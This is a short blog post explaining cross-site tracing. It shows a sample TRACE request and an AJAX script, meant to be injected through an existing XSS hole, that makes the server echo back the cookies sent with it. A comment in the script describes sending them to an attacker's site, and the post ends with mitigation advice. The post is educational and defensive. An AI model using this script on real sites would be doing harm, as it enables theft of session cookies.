Cross site tracing is a technique that is used to circumvent Microsoft's httpOnly flag. The httpOnly flag is used to keep scripts from accessing cookie information. The http trace function is a http debugging function that will echo back any information sent to it in a trace request. For example:
TRACE http://mysite.com /HTTP/1.1
Host: http://mysite.com
Cookie: Auth-cookie.....
would echo the the cookie entire header back to the requester. Since a script did not access the cookie , the httpOnly flag did not protect the cookie . An attacker could use an existing CSS vulnerability to insert the following AJAX code into a website.
< script >
var xhr;
var url = "http://mysite.com";
try {
xhr = new ActiveXObject('Msxml2.XMLHTTP');
}
catch (e)
{
try {
xhr = new ActiveXObject('Microsoft.XMLHTTP');
}
catch (e2)
{
try {
xhr = new XMLHttpRequest();
}
catch (e3) { xhr = false; }
}
}
xhr.open('TRACE', url , true);
xhr.send(null);
// collect the response and send it to a site that you control
< /script >
The above code would use AJAX to send a trace request to the server hosting the website. The browser would send and cookie information that it holds for the website. The server would then echo back the information that was sent to it by the browser, including the cookie and the AJAX script could collect he response and send it to a page controlled by the attacker. This is bad because the attacker now has access to important session information.
Attack Mitigation:
1. Disable trace on your web servers.
2. Also luck for us Firefox and IE have disabled AJAX trace requests. So using one of these browsers will stop this attack using AJAX. It is still possible to execute the attack using other methods like ActiveX though.
For further explanation see: http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment